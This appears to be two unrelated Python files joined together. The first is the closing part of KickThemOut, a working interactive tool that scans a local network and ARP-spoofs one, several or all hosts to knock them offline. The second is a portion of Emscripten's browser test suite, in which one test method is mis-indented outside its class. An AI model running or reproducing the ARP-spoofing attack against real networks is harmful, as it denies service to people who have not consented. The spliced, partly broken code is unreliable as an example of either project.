    the real gateway MAC to restore its connectivity.
    """
    os.system("clear||cls")
    print("\n{}kickONEOff{} selected...{}\n".format(RED, GREEN, END))
    global stopAnimation
    stopAnimation = False
    t = threading.Thread(target=scanningAnimation, args=('Hang on...',))
    t.daemon = True
    t.start()
    # commence scanning process
    try:
        scanNetwork()
    except KeyboardInterrupt:
        shutdown()
    stopAnimation = True
    print("Online IPs: ")
    for i in range(len(onlineIPs)):
        mac = ""
        for host in hostsList:
            if host[0] == onlineIPs[i]:
                mac = host[1]
        try:
            # best-effort reverse DNS for a friendly name
            hostname = utils.socket.gethostbyaddr(onlineIPs[i])[0]
        except:
            hostname = "N/A"
        vendor = resolveMac(mac)
        print(" [{}{}{}] {}{}{}\t{}{}\t{} ({}{}{}){}".format(YELLOW, str(i), WHITE, RED, str(onlineIPs[i]), BLUE, mac, GREEN, vendor, YELLOW, hostname, GREEN, END))
    canBreak = False
    while not canBreak:
        try:
            choice = int(input("\nChoose a target: "))
            oneTargetIP = onlineIPs[choice]
            canBreak = True
        except KeyboardInterrupt:
            shutdown()
        except:
            print("\n{}ERROR: Please enter a number from the list!{}".format(RED, END))
    # locate MAC of specified device
    oneTargetMAC = ""
    for host in hostsList:
        if host[0] == oneTargetIP:
            oneTargetMAC = host[1]
    if oneTargetMAC == "":
        print("\nIP address is not up. Please try again.")
        return
    print("\n{}Target: {}{}".format(GREEN, END, oneTargetIP))
    if options.packets is not None:
        print("\n{}Spoofing started... {}( {} pkts/min )".format(GREEN, END, str(options.packets)))
    else:
        print("\n{}Spoofing started... {}".format(GREEN, END))
    try:
        while True:
            # broadcast malicious ARP packets
            spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, oneTargetIP, oneTargetMAC)
            if options.packets is not None:
                time.sleep(60/float(options.packets))
            else:
                time.sleep(10)
    except KeyboardInterrupt:
        # re-arp target on KeyboardInterrupt exception
        print("\n{}Re-arping{} target...{}".format(RED, GREEN, END))
        reArp = 1
        while reArp != 10:
            try:
                # broadcast ARP packets with legitimate info to restore connection.
                # BUGFIX: previously this sent to host[0]/host[1] — the stale loop
                # variable left over from the listing loop above (i.e. the LAST
                # scanned host), not the chosen victim — so the actual target's
                # ARP cache was usually never restored.
                spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, oneTargetIP, oneTargetMAC)
            except KeyboardInterrupt:
                pass
            except:
                runDebug()
            reArp += 1
            time.sleep(0.2)
        print("{}Re-arped{} target successfully.{}".format(RED, GREEN, END))
# kick multiple devices
def kicksomeoff():
    """Interactively pick several online hosts (comma-separated list indices)
    and ARP-spoof them off the network; Ctrl-C re-ARPs them all to restore
    connectivity."""
    os.system("clear||cls")
    print("\n{}kickSOMEOff{} selected...{}\n".format(RED, GREEN, END))
    global stopAnimation
    stopAnimation = False
    t = threading.Thread(target=scanningAnimation, args=('Hang on...',))
    t.daemon = True
    t.start()
    # commence scanning process
    try:
        scanNetwork()
    except KeyboardInterrupt:
        shutdown()
    stopAnimation = True
    print("Online IPs: ")
    for i in range(len(onlineIPs)):
        mac = ""
        for host in hostsList:
            if host[0] == onlineIPs[i]:
                mac = host[1]
        try:
            # best-effort reverse DNS for a friendly name
            hostname = utils.socket.gethostbyaddr(onlineIPs[i])[0]
        except:
            hostname = "N/A"
        vendor = resolveMac(mac)
        print(" [{}{}{}] {}{}{}\t{}{}\t{} ({}{}{}){}".format(YELLOW, str(i), WHITE, RED, str(onlineIPs[i]), BLUE, mac, GREEN, vendor, YELLOW, hostname, GREEN, END))
    canBreak = False
    while not canBreak:
        try:
            choice = input("\nChoose devices to target (comma-separated): ")
            if ',' in choice:
                someTargets = choice.split(",")
                canBreak = True
            else:
                # a single index is what kickoneoff is for
                print("\n{}ERROR: Please select more than 1 devices from the list.{}\n".format(RED, END))
        except KeyboardInterrupt:
            shutdown()
    someIPList = ""
    for i in someTargets:
        try:
            someIPList += onlineIPs[int(i)] + ", "
        except KeyboardInterrupt:
            shutdown()
        except:
            # a non-numeric or out-of-range index aborts the whole selection
            print("\n{}ERROR: '{}{}{}' is not in the list.{}\n".format(RED, GREEN, i, RED, END))
            return
    someIPList = someIPList[:-2] + END  # drop the trailing ", "
    print("\n{}Targets: {}{}".format(GREEN, END, someIPList))
    if options.packets is not None:
        print("\n{}Spoofing started... {}( {} pkts/min )".format(GREEN, END, str(options.packets)))
    else:
        print("\n{}Spoofing started... {}".format(GREEN, END))
    try:
        while True:
            # broadcast malicious ARP packets
            for i in someTargets:
                ip = onlineIPs[int(i)]
                for host in hostsList:
                    if host[0] == ip:
                        spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1])
            if options.packets is not None:
                time.sleep(60/float(options.packets))
            else:
                time.sleep(10)
    except KeyboardInterrupt:
        # re-arp targets on KeyboardInterrupt exception
        print("\n{}Re-arping{} targets...{}".format(RED, GREEN, END))
        reArp = 1
        while reArp != 10:
            # broadcast ARP packets with legitimate info to restore connection
            for i in someTargets:
                ip = onlineIPs[int(i)]
                for host in hostsList:
                    if host[0] == ip:
                        try:
                            spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1])
                        except KeyboardInterrupt:
                            pass
                        except:
                            runDebug()
            reArp += 1
            time.sleep(0.2)
        print("{}Re-arped{} targets successfully.{}".format(RED, GREEN, END))
# kick all devices
def kickalloff():
    """ARP-spoof every online host except the gateway itself; periodically
    rescans for newly joined hosts, and on Ctrl-C re-ARPs everyone to restore
    connectivity."""
    os.system("clear||cls")
    print("\n{}kickALLOff{} selected...{}\n".format(RED, GREEN, END))
    global stopAnimation
    stopAnimation = False
    t = threading.Thread(target=scanningAnimation, args=('Hang on...',))
    t.daemon = True
    t.start()
    # commence scanning process
    try:
        scanNetwork()
    except KeyboardInterrupt:
        shutdown()
    stopAnimation = True
    print("Target(s): ")
    for i in range(len(onlineIPs)):
        mac = ""
        for host in hostsList:
            if host[0] == onlineIPs[i]:
                mac = host[1]
        try:
            # best-effort reverse DNS for a friendly name
            hostname = utils.socket.gethostbyaddr(onlineIPs[i])[0]
        except:
            hostname = "N/A"
        vendor = resolveMac(mac)
        print(" [{}{}{}] {}{}{}\t{}{}\t{} ({}{}{}){}".format(YELLOW, str(i), WHITE, RED, str(onlineIPs[i]), BLUE, mac, GREEN, vendor, YELLOW, hostname, GREEN, END))
    if options.packets is not None:
        print("\n{}Spoofing started... {}( {} pkts/min )".format(GREEN, END, str(options.packets)))
    else:
        print("\n{}Spoofing started... {}".format(GREEN, END))
    try:
        # broadcast malicious ARP packets
        reScan = 0
        while True:
            for host in hostsList:
                if host[0] != defaultGatewayIP:
                    # dodge gateway (avoid crashing network itself)
                    spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1])
            reScan += 1
            if reScan == 4:
                # every 4 rounds, rescan to pick up hosts that joined meanwhile
                reScan = 0
                scanNetwork()
            if options.packets is not None:
                time.sleep(60/float(options.packets))
            else:
                time.sleep(10)
    except KeyboardInterrupt:
        print("\n{}Re-arping{} targets...{}".format(RED, GREEN, END))
        reArp = 1
        while reArp != 10:
            # broadcast ARP packets with legitimate info to restore connection
            for host in hostsList:
                if host[0] != defaultGatewayIP:
                    try:
                        # dodge gateway
                        spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1])
                    except KeyboardInterrupt:
                        pass
                    except:
                        runDebug()
            reArp += 1
            time.sleep(0.2)
        print("{}Re-arped{} targets successfully.{}".format(RED, GREEN, END))
# script's main function
def main():
    """Entry point after setup: print the banner and dispatch to the
    interactive menu (default), scan-only listing (-s), or the
    non-interactive attack (-t).

    BUGFIX: ``stopAnimation`` was assigned in the scan branch without a
    ``global`` declaration, so the assignments created a dead local and never
    reached the scanningAnimation daemon thread; declare it global.
    """
    global stopAnimation
    # display heading
    heading()
    if interactive:
        print("\n{}Using interface '{}{}{}' with MAC address '{}{}{}'.\nGateway IP: '{}{}{}' --> {}{}{} hosts are up.{}".format(
            GREEN, RED, defaultInterface, GREEN, RED, defaultInterfaceMac, GREEN, RED, defaultGatewayIP, GREEN, RED, str(len(hostsList)), GREEN, END))
        # display warning in case of no active hosts
        if len(hostsList) == 0 or len(hostsList) == 1:
            if len(hostsList) == 1:
                if hostsList[0][0] == defaultGatewayIP:
                    # only the gateway answered: nothing to kick
                    print("\n{}{}WARNING: There are {}0 hosts up{} on you network except your gateway.\n\tYou can't kick anyone off {}:/{}\n".format(
                        GREEN, RED, GREEN, RED, GREEN, END))
                    os._exit(1)
            else:
                # zero hosts at all: the scan most likely failed
                print(
                    "\n{}{}WARNING: There are {}0 hosts{} up on you network.\n\tIt looks like something went wrong {}:/{}".format(
                        GREEN, RED, GREEN, RED, GREEN, END))
                print(
                    "\n{}If you are experiencing this error multiple times, please submit an issue here:\n\t{}https://github.com/k4m4/kickthemout/issues\n{}".format(
                        RED, BLUE, END))
                os._exit(1)
    else:
        print("\n{}Using interface '{}{}{}' with MAC address '{}{}{}'.\nGateway IP: '{}{}{}' --> Target(s): '{}{}{}'.{}".format(
            GREEN, RED, defaultInterface, GREEN, RED, defaultInterfaceMac, GREEN, RED, defaultGatewayIP, GREEN, RED, ", ".join(options.targets), GREEN, END))
    if options.targets is None and options.scan is False:
        # interactive menu loop
        try:
            while True:
                optionBanner()
                header = ('{}kickthemout{}> {}'.format(BLUE, WHITE, END))
                choice = input(header)
                if choice.upper() == 'E' or choice.upper() == 'EXIT':
                    shutdown()
                elif choice == '1':
                    kickoneoff()
                elif choice == '2':
                    kicksomeoff()
                elif choice == '3':
                    kickalloff()
                elif choice.upper() == 'CLEAR':
                    os.system("clear||cls")
                else:
                    print("\n{}ERROR: Please select a valid option.{}\n".format(RED, END))
        except KeyboardInterrupt:
            shutdown()
    elif options.scan is not False:
        # scan-only mode (-s): list online hosts and return
        stopAnimation = False
        t = threading.Thread(target=scanningAnimation, args=('Scanning your network, hang on...',))
        t.daemon = True
        t.start()
        # commence scanning process
        try:
            scanNetwork()
        except KeyboardInterrupt:
            shutdown()
        stopAnimation = True
        print("\nOnline IPs: ")
        for i in range(len(onlineIPs)):
            mac = ""
            for host in hostsList:
                if host[0] == onlineIPs[i]:
                    mac = host[1]
            try:
                hostname = utils.socket.gethostbyaddr(onlineIPs[i])[0]
            except:
                hostname = "N/A"
            vendor = resolveMac(mac)
            print(" [{}{}{}] {}{}{}\t{}{}\t{} ({}{}{}){}".format(YELLOW, str(i), WHITE, RED, str(onlineIPs[i]), BLUE, mac, GREEN, vendor, YELLOW, hostname, GREEN, END))
    else:
        nonInteractiveAttack()
if __name__ == '__main__':
    # implement option parser
    # render the epilog verbatim so the Examples block keeps its formatting
    optparse.OptionParser.format_epilog = lambda self, formatter: self.epilog
    version = '2.0'
    examples = ('\nExamples:\n'+
        ' sudo python3 kickthemout.py --target 192.168.1.10 \n'+
        ' sudo python3 kickthemout.py -t 192.168.1.5,192.168.1.10 -p 30\n'+
        ' sudo python3 kickthemout.py -s\n'+
        ' sudo python3 kickthemout.py (interactive mode)\n')
    parser = optparse.OptionParser(epilog=examples,
        usage='sudo python3 %prog [options]',
        prog='kickthemout.py', version=('KickThemOut ' + version))
    parser.add_option('-p', '--packets', action='store',
        dest='packets', help='number of packets broadcasted per minute (default: 6)')
    parser.add_option('-s', '--scan', action='store_true', default=False,
        dest='scan', help='perform a quick network scan and exit')
    def targetList(option, opt, value, parser):
        # optparse callback: split the comma-separated -t argument into a list
        setattr(parser.values, option.dest, value.split(','))
    parser.add_option('-t', '--target', action='callback',
        callback=targetList, type='string',
        dest='targets', help='specify target IP address(es) and perform attack')
    (options, argv) = parser.parse_args()
    # bail out early when offline: the tool needs the network anyway
    try:
        if checkInternetConnection():
            pass
        else:
            print("\n{}ERROR: It seems that you are offline. Please check your internet connection.{}\n".format(RED, END))
            os._exit(1)
    except KeyboardInterrupt:
        shutdown()
    # configure appropriate network info
    try:
        defaultInterface = getDefaultInterface()
        defaultGatewayIP = getGatewayIP()
        defaultInterfaceMac = getDefaultInterfaceMAC()
        # NOTE(review): `global` at module scope is a no-op; the name is
        # already module-level.
        global defaultGatewayMacSet
        defaultGatewayMacSet = False
    except KeyboardInterrupt:
        shutdown()
    # -p must be a whole number of packets per minute
    if (options.packets is not None and (options.packets).isdigit()) or options.packets is None:
        pass
    else:
        print("\n{}ERROR: Argument for number of packets broadcasted per minute must be an integer {}(e.g. {}--packet 60{}).\n".format(RED, END, BLUE, END))
        os._exit(1)
    if options.targets is None:
        # set to interactive attack
        interactive = True
        # NOTE(review): `global` at module scope is a no-op here as well.
        global stopAnimation
        stopAnimation = False
        t = threading.Thread(target=scanningAnimation, args=('Scanning your network, hang on...',))
        t.daemon = True
        t.start()
        # commence scanning process
        try:
            scanNetwork()
        except KeyboardInterrupt:
            shutdown()
        stopAnimation = True
    else:
        # set to non-interactive attack
        interactive = False
    main()
test_browser.py | import BaseHTTPServer, multiprocessing, os, shutil, subprocess, unittest, zlib, webbrowser, time, shlex
from runner import BrowserCore, path_from_root
from tools.shared import *
# User can specify an environment variable EMSCRIPTEN_BROWSER to force the browser test suite to
# run using another browser command line than the default system browser.
emscripten_browser = os.environ.get('EMSCRIPTEN_BROWSER')
if emscripten_browser:
    # the variable holds a full command line; split it shell-style
    cmd = shlex.split(emscripten_browser)
    def run_in_other_browser(url):
        # launch the user-specified browser command with the test URL appended
        Popen(cmd + [url])
    # monkey-patch the stdlib webbrowser module so every test uses the override
    webbrowser.open_new = run_in_other_browser
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum):
    """Serve *data* on localhost:11111 for the chunked synchronous XHR test,
    optionally honouring HTTP byte-range requests.

    Handles a fixed number of requests (expectedConns + 1) and then returns.
    NOTE(review): chunkSize and checksum are unused here — presumably the
    page under test verifies the checksum on the client side.
    """
    class ChunkedServerHandler(BaseHTTPServer.BaseHTTPRequestHandler):
        def sendheaders(s, extra=[], length=len(data)):
            # CORS headers let the page served from localhost:8888 read this response
            s.send_response(200)
            s.send_header("Content-Length", str(length))
            s.send_header("Access-Control-Allow-Origin", "http://localhost:8888")
            s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
            s.send_header("Content-type", "application/octet-stream")
            if support_byte_ranges:
                s.send_header("Accept-Ranges", "bytes")
            for i in extra:
                s.send_header(i[0], i[1])
            s.end_headers()
        def do_HEAD(s):
            s.sendheaders()
        def do_OPTIONS(s):
            # CORS preflight: allow the Range header, send no body
            s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
        def do_GET(s):
            if not support_byte_ranges:
                s.sendheaders()
                s.wfile.write(data)
            else:
                # serve only the requested slice, e.g. "Range: bytes=0-99"
                (start, end) = s.headers.get("range").split("=")[1].split("-")
                start = int(start)
                end = int(end)
                end = min(len(data)-1, end)
                length = end-start+1
                s.sendheaders([],length)
                s.wfile.write(data[start:end+1])
                s.wfile.close()
    expectedConns = 11
    httpd = BaseHTTPServer.HTTPServer(('localhost', 11111), ChunkedServerHandler)
    for i in range(expectedConns+1):
        httpd.handle_request()
class browser(BrowserCore):
    @staticmethod
    def audio():
        """Return a TestSuite of the audio tests, which need a human listener
        to verify the sounds are correct (not part of the automated run)."""
        print
        print 'Running the browser audio tests. Make sure to listen to hear the correct results!'
        print
        audio_test_cases = [
            'test_sdl_audio',
            'test_sdl_audio_mix_channels',
            'test_sdl_audio_mix',
            'test_sdl_audio_quickload',
            'test_sdl_audio_beeps',
            'test_openal_playback',
            'test_openal_buffers',
            'test_freealut'
        ]
        return unittest.TestSuite(map(browser, audio_test_cases))
    @classmethod
    def setUpClass(self):
        """Print a reminder that the browser must allow localhost popups.

        NOTE(review): the classmethod parameter is conventionally named ``cls``.
        """
        super(browser, self).setUpClass()
        print
        print 'Running the browser tests. Make sure the browser allows popups from localhost.'
        print
    def test_html(self):
        """Build hello_world_sdl.cpp to HTML and compare the rendered canvas
        against the htmltest.png reference image."""
        # test HTML generation.
        self.btest('hello_world_sdl.cpp', reference='htmltest.png',
                   message='You should see "hello, world!" and a colored cube.')
    def test_html_source_map(self):
        """Build src.cpp with -g4 (source maps) and open the page so a human
        can check in devtools that the original C++ source is visible and
        line numbers map correctly (manual-bisect test)."""
        cpp_file = os.path.join(self.get_dir(), 'src.cpp')
        html_file = os.path.join(self.get_dir(), 'src.html')
        # browsers will try to 'guess' the corresponding original line if a
        # generated line is unmapped, so if we want to make sure that our
        # numbering is correct, we need to provide a couple of 'possible wrong
        # answers'. thus, we add some printf calls so that the cpp file gets
        # multiple mapped lines. in other words, if the program consists of a
        # single 'throw' statement, browsers may just map any thrown exception to
        # that line, because it will be the only mapped line.
        with open(cpp_file, 'w') as f:
            f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
        # use relative paths when calling emcc, because file:// URIs can only load
        # sourceContent when the maps are relative paths
        try_delete(html_file)
        try_delete(html_file + '.map')
        Popen([PYTHON, EMCC, 'src.cpp', '-o', 'src.html', '-g4'],
              cwd=self.get_dir()).communicate()
        assert os.path.exists(html_file)
        assert os.path.exists(html_file + '.map')
        webbrowser.open_new('file://' + html_file)
        time.sleep(1)  # give the browser a moment to load before printing instructions
        print '''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step through and see the print (best to run with EM_SAVE_DIR=1 for the reload).
'''
    def build_native_lzma(self):
        """Build the native lzma helper binary used by the --compression
        tests; a no-op if an executable build already exists."""
        lzma_native = path_from_root('third_party', 'lzma.js', 'lzma-native')
        if os.path.isfile(lzma_native) and os.access(lzma_native, os.X_OK): return
        cwd = os.getcwd()
        try:
            os.chdir(path_from_root('third_party', 'lzma.js'))
            if WINDOWS and Building.which('mingw32-make'): # On Windows prefer using MinGW make if it exists, otherwise fall back to hoping we have cygwin make.
                Popen(['doit.bat']).communicate()
            else:
                Popen(['sh', './doit.sh']).communicate()
        finally:
            # always restore the working directory, even if the build fails
            os.chdir(cwd)
    def test_split(self):
        """Build with --split so emcc emits separate main / functions /
        include files, stitch them into a hand-written shell page, and verify
        the page still renders the reference image in the browser."""
        # test HTML generation.
        self.reftest(path_from_root('tests', 'htmltest.png'))
        output = Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_sdl.cpp'), '-o', 'something.js', '--split', '100', '--pre-js', 'reftest.js']).communicate()
        assert os.path.exists(os.path.join(self.get_dir(), 'something.js')), 'must be main js file'
        assert os.path.exists(os.path.join(self.get_dir(), 'something_functions.js')), 'must be functions js file'
        assert os.path.exists(os.path.join(self.get_dir(), 'something.include.html')), 'must be js include file'
        # hand-written shell page with the standard Module boilerplate; the
        # generated include file is spliced in before </body>
        open(os.path.join(self.get_dir(), 'something.html'), 'w').write('''
<!doctype html>
<html lang="en-us">
<head>
<meta charset="utf-8">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Emscripten-Generated Code</title>
<style>
.emscripten { padding-right: 0; margin-left: auto; margin-right: auto; display: block; }
canvas.emscripten { border: 1px solid black; }
textarea.emscripten { font-family: monospace; width: 80%; }
div.emscripten { text-align: center; }
</style>
</head>
<body>
<hr/>
<div class="emscripten" id="status">Downloading...</div>
<div class="emscripten">
<progress value="0" max="100" id="progress" hidden=1></progress>
</div>
<canvas class="emscripten" id="canvas" oncontextmenu="event.preventDefault()"></canvas>
<hr/>
<div class="emscripten"><input type="button" value="fullscreen" onclick="Module.requestFullScreen()"></div>
<hr/>
<textarea class="emscripten" id="output" rows="8"></textarea>
<hr>
<script type='text/javascript'>
// connect to canvas
var Module = {
preRun: [],
postRun: [],
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
// These replacements are necessary if you render to raw HTML
//text = text.replace(/&/g, "&");
//text = text.replace(/</g, "<");
//text = text.replace(/>/g, ">");
//text = text.replace('\\n', '<br>', 'g');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})(),
printErr: function(text) {
if (0) { // XXX disabled for safety typeof dump == 'function') {
dump(text + '\\n'); // fast, straight to the real console
} else {
console.log(text);
}
},
canvas: document.getElementById('canvas'),
setStatus: function(text) {
if (Module.setStatus.interval) clearInterval(Module.setStatus.interval);
var m = text.match(/([^(]+)\((\d+(\.\d+)?)\/(\d+)\)/);
var statusElement = document.getElementById('status');
var progressElement = document.getElementById('progress');
if (m) {
text = m[1];
progressElement.value = parseInt(m[2])*100;
progressElement.max = parseInt(m[4])*100;
progressElement.hidden = false;
} else {
progressElement.value = null;
progressElement.max = null;
progressElement.hidden = true;
}
statusElement.innerHTML = text;
},
totalDependencies: 0,
monitorRunDependencies: function(left) {
this.totalDependencies = Math.max(this.totalDependencies, left);
Module.setStatus(left ? 'Preparing... (' + (this.totalDependencies-left) + '/' + this.totalDependencies + ')' : 'All downloads complete.');
}
};
Module.setStatus('Downloading...');
</script>''' + open(os.path.join(self.get_dir(), 'something.include.html')).read() + '''
</body>
</html>
''')
        self.run_browser('something.html', 'You should see "hello, world!" and a colored cube.', '/report_result?0')
    def test_split_in_source_filenames(self):
        """Like test_split, but with -g so the split function files are named
        after the source file (something/hello_world_sdl.cpp.js); verifies
        the stitched page still renders the reference image."""
        self.reftest(path_from_root('tests', 'htmltest.png'))
        output = Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_sdl.cpp'), '-o', 'something.js', '-g', '--split', '100', '--pre-js', 'reftest.js']).communicate()
        assert os.path.exists(os.path.join(self.get_dir(), 'something.js')), 'must be main js file'
        assert os.path.exists(os.path.join(self.get_dir(), 'something', 'hello_world_sdl.cpp.js')), 'must be functions js file'
        assert os.path.exists(os.path.join(self.get_dir(), 'something.include.html')), 'must be js include file'
        # hand-written shell page with the standard Module boilerplate; the
        # generated include file is spliced in before </body>
        open(os.path.join(self.get_dir(), 'something.html'), 'w').write('''
<!doctype html>
<html lang="en-us">
<head>
<meta charset="utf-8">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Emscripten-Generated Code</title>
<style>
.emscripten { padding-right: 0; margin-left: auto; margin-right: auto; display: block; }
canvas.emscripten { border: 1px solid black; }
textarea.emscripten { font-family: monospace; width: 80%; }
div.emscripten { text-align: center; }
</style>
</head>
<body>
<hr/>
<div class="emscripten" id="status">Downloading...</div>
<div class="emscripten">
<progress value="0" max="100" id="progress" hidden=1></progress>
</div>
<canvas class="emscripten" id="canvas" oncontextmenu="event.preventDefault()"></canvas>
<hr/>
<div class="emscripten"><input type="button" value="fullscreen" onclick="Module.requestFullScreen()"></div>
<hr/>
<textarea class="emscripten" id="output" rows="8"></textarea>
<hr>
<script type='text/javascript'>
// connect to canvas
var Module = {
preRun: [],
postRun: [],
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
// These replacements are necessary if you render to raw HTML
//text = text.replace(/&/g, "&");
//text = text.replace(/</g, "<");
//text = text.replace(/>/g, ">");
//text = text.replace('\\n', '<br>', 'g');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})(),
printErr: function(text) {
if (0) { // XXX disabled for safety typeof dump == 'function') {
dump(text + '\\n'); // fast, straight to the real console
} else {
console.log(text);
}
},
canvas: document.getElementById('canvas'),
setStatus: function(text) {
if (Module.setStatus.interval) clearInterval(Module.setStatus.interval);
var m = text.match(/([^(]+)\((\d+(\.\d+)?)\/(\d+)\)/);
var statusElement = document.getElementById('status');
var progressElement = document.getElementById('progress');
if (m) {
text = m[1];
progressElement.value = parseInt(m[2])*100;
progressElement.max = parseInt(m[4])*100;
progressElement.hidden = false;
} else {
progressElement.value = null;
progressElement.max = null;
progressElement.hidden = true;
}
statusElement.innerHTML = text;
},
totalDependencies: 0,
monitorRunDependencies: function(left) {
this.totalDependencies = Math.max(this.totalDependencies, left);
Module.setStatus(left ? 'Preparing... (' + (this.totalDependencies-left) + '/' + this.totalDependencies + ')' : 'All downloads complete.');
}
};
Module.setStatus('Downloading...');
</script>''' + open(os.path.join(self.get_dir(), 'something.include.html')).read() + '''
</body>
</html>
''')
        self.run_browser('something.html', 'You should see "hello, world!" and a colored cube.', '/report_result?0')
    def test_compression(self):
        """Compile with --compression (lzma): check the compressed side file
        exists and is smaller, then rename away the uncompressed js and verify
        the page still runs from page.js.compress alone."""
        open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
printf("hello compressed world\n");
int result = 1;
REPORT_RESULT();
return 0;
}
'''))
        self.build_native_lzma()
        # --compression takes native-encoder,js-decoder,decode-function
        Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '-o', 'page.html',
               '--compression', '%s,%s,%s' % (path_from_root('third_party', 'lzma.js', 'lzma-native'),
                                              path_from_root('third_party', 'lzma.js', 'lzma-decoder.js'),
                                              'LZMA.decompress')]).communicate()
        assert os.path.exists(os.path.join(self.get_dir(), 'page.js')), 'must be side js'
        assert os.path.exists(os.path.join(self.get_dir(), 'page.js.compress')), 'must be side compressed js'
        assert os.stat(os.path.join(self.get_dir(), 'page.js')).st_size > os.stat(os.path.join(self.get_dir(), 'page.js.compress')).st_size, 'compressed file must be smaller'
        # force the page to load the compressed file by hiding the plain one
        shutil.move(os.path.join(self.get_dir(), 'page.js'), 'page.js.renamedsoitcannotbefound');
        self.run_browser('page.html', '', '/report_result?1')
def test_preload_file(self):
    """Exercise emcc --preload-file across the full matrix of source and
    destination path syntaxes (relative, absolute, '@' remapping, hidden
    files, whole directories), plus --no-heap-copy, -o into a subdirectory,
    and the FS.createPreloadedFile JS API."""
    # Normalize to forward slashes so the same path string works on Windows.
    absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
    open(absolute_src_path, 'w').write('''load me right before running the code please''')
    # Hidden-file (leading dot) variant for the '@' remap case below.
    absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
    open(absolute_src_path2, 'w').write('''load me right before running the code please''')
    def make_main(path):
        # Regenerate main.cpp so it fopen()s `path` on the Emscripten virtual
        # FS and reports 1 iff the expected preloaded text is found there.
        print 'make main at', path
        open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT();
return 0;
}
''' % path))
    test_cases = [
        # (source preload-file string, file on target FS to load)
        ("somefile.txt", "somefile.txt"),
        (".somefile.txt@somefile.txt", "somefile.txt"),
        ("./somefile.txt", "somefile.txt"),
        ("somefile.txt@file.txt", "file.txt"),
        ("./somefile.txt@file.txt", "file.txt"),
        ("./somefile.txt@./file.txt", "file.txt"),
        ("somefile.txt@/file.txt", "file.txt"),
        ("somefile.txt@/", "somefile.txt"),
        (absolute_src_path + "@file.txt", "file.txt"),
        (absolute_src_path + "@/file.txt", "file.txt"),
        (absolute_src_path + "@/", "somefile.txt"),
        ("somefile.txt@/directory/file.txt", "/directory/file.txt"),
        ("somefile.txt@/directory/file.txt", "directory/file.txt"),
        (absolute_src_path + "@/directory/file.txt", "directory/file.txt")]
    for test in test_cases:
        (srcpath, dstpath) = test
        print 'Testing', srcpath, dstpath
        make_main(dstpath)
        Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '-o', 'page.html']).communicate()
        self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
    # Test that '--no-heap-copy' works.
    make_main('somefile.txt')
    Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'somefile.txt', '--no-heap-copy', '-o', 'page.html']).communicate()
    self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
    # By absolute path
    make_main('somefile.txt') # absolute becomes relative
    Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'page.html']).communicate()
    self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
    # Test subdirectory handling with asset packaging.
    os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/').replace('\\', '/'))
    os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/.git').replace('\\', '/')) # Test adding directory that shouldn't exist.
    os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset2/').replace('\\', '/'))
    open(os.path.join(self.get_dir(), 'assets/sub/asset1/file1.txt'), 'w').write('''load me right before running the code please''')
    open(os.path.join(self.get_dir(), 'assets/sub/asset1/.git/shouldnt_be_embedded.txt'), 'w').write('''this file should not get embedded''')
    open(os.path.join(self.get_dir(), 'assets/sub/asset2/file2.txt'), 'w').write('''load me right before running the code please''')
    absolute_assets_src_path = os.path.join(self.get_dir(), 'assets').replace('\\', '/')
    def make_main_two_files(path1, path2, nonexistingpath):
        # Like make_main, but also requires `path2` to exist on the virtual FS
        # and `nonexistingpath` (e.g. a .git internals file) to be absent.
        open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT();
return 0;
}
''' % (path1, path2, nonexistingpath)))
    test_cases = [
        # (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
